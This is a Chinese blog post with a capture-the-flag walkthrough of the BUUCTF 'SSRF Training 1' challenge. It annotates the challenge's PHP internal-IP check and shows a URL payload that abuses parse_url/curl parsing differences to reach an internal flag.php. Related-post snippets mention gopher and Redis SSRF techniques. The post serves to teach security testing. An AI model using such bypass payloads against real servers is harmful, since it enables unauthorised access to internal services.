BUUCTF [第二章 web进阶]SSRF Training1

最新推荐文章于 2022-08-22 20:38:18 发布
最新推荐文章于 2022-08-22 20:38:18 发布
阅读量505 收藏 2
点赞数
分类专栏: BUUCTF SSRF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_41572027/article/details/125455849
版权

1.尝试输入正确URL,能正常跳转

2.查看网页源码,发现challenge.php网页

3.进入challenge.php,学习源码

function check_inner_ip($url)  //获取url的域名,将域名转为ip,然后再判断这个ip是否是私有地址
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    //将url与'匹配字段'进行匹配,返回匹配次数0或1
    //^从开头开始匹配
   	//? 匹配0或1个正好在它之前的那个字符。注意:这个元字符不是所有的软件都支持的
    //( )标记一个子表达式的开始和结束位置。子表达式可以获取供以后使用。要匹配这些字符,请使用 \( 和 \)
    //.	匹配除换行符 \n 之外的任何单字符。要匹配 . ,请使用 \. 
    //*	匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 \*
    //$:从字符串末尾进行匹配

    if (!$match_result)   //判断结果是否为0
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url);   //解析url 返回其组成部分
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip);  //将ip地址转换为小数点 整形形式
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 
function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url))  //判断是否为私有地址
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init();  
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch);   //抓住URL传给浏览器
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch);   //关闭curl资源,并释放资源
        var_dump($output); //执行
    } 
     
}

4.构造payload 绕过parse_url()

http://a@127.0.0.1:80@baidu.com

 5.成功绕过后,访问flag.php 获得flag

challenge.php?url=http://@127.0.0.1:80@baidu.com/flag.php

 便捷方法:在url栏输入http://127.0.0.1/flag.php 即可成功访问

 

起名字怎么这么难
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web]SSRF
weixin_46703850的博客
02-23 242
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
BUUCTF-web
weixin_43896504的博客
07-21 377
BUUCTF
[第二章 web]SSRF Training
m0_62805300的博客
04-23 187
点击intersting challenge查看代码 有两个函数 第一个是判断是否为内网ip 第二个是检测请求的url是否安全 parse_url函数 cURL 函数 菜鸟教程 url格式 http://username:password@hostname/path?arg=value#anchor 使用parse_url函数后 构造payload ?url=http://a:@127.0.0.1:80@baidu.com/flag.php ...
[第二章 web]SSRF Training 1
qq_45951598的博客
03-05 1396
一开始打开环境,可以看到一个链接,打开看一下。 打开是个代码审计 <?php highlight_file(__FILE__);//用PHP高亮显示当前的文件 function check_inner_ip($url) //获取url的域名,将域名转为ip,然后再判断这个ip是否是私有地址 { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); //返回$url的匹配,值将是 0 次(不匹配)或 1
buuctf [第二章 web]SSRF Training
qq_52671379的博客
04-20 1873
buuctf [第二章 web]SSRF Training
buuctf[第二章 web]SSRF Training 1
m0_52299173的博客
07-08 769
[第二章 web]SSRF Training 1
[BUUCTF] 备赛刷题第三天
Dannie01的博客
11-05 246
刷题目录[网鼎杯 2020 玄武组]SSRFMe [网鼎杯 2020 玄武组]SSRFMe 想好好做一下ssrf打redis <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); }
DAY37:SSRF 漏洞
qq_49433473的博客
08-22 1322
SSRF(Sever Side Request Forgery)—服务器端请求伪造、产生 SSRF 漏洞的函数、SSRF 漏洞可能存在的场景、SSRF 漏洞绕过方式、SSRF 漏洞的危害、SSRF 漏洞防御、小练习
[BUUCTF-n1book][第二章 web]SSRF Training
nareku的博客
07-24 721
随便看看,发现了源码先代码审计(又臭又长的代码审计好讨厌捏…)限制了协议和ip地址。这里忽略了paerse_url()和curl同时处理url的差异,因此我们可以差异来行绕过。前面已经测试过parse_url()函数得到如下结果可以看到parse_url是以www.baidu.com为目标的那么整理一下代码逻辑就是先检测是否为内网ip,通过parse_url,最后通过curl来完成请求。那么绕过方法就是让parse_url来处理外部ip,curl来处理内网ip。...
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
第一节 SSRF原理介绍-01
最新发布
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
CURLOPT_RETURNTRANSFER
weixin_34111819的博客
06-21 2022
例1:CURLOPT_RETURNTRANSFER设为true时$cu = curl_init();curl_setopt($cu, CURLOPT_URL, "http://0x007.blog.51cto.com");curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);curl_exec($cu);这样不会输出结果,好比是retu...
CTFHub-SSRF
Lionel_kai的博客
09-20 1146
1.POST 去访问flag.php,发现叫我们从127.0.0.1访问, 于是构造?url=http://127.0.0.1/flag.php,发现一个key,再根据题目应该是要求我们使用post提交这个key 这里使用gopher协议提交数据,这里采用了一个python脚本来构造gopher URL gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0...
BUUCTF解题web十一道
qq_45837896的博客
05-26 1251
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 入发现是
buuctf web
08-15
而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值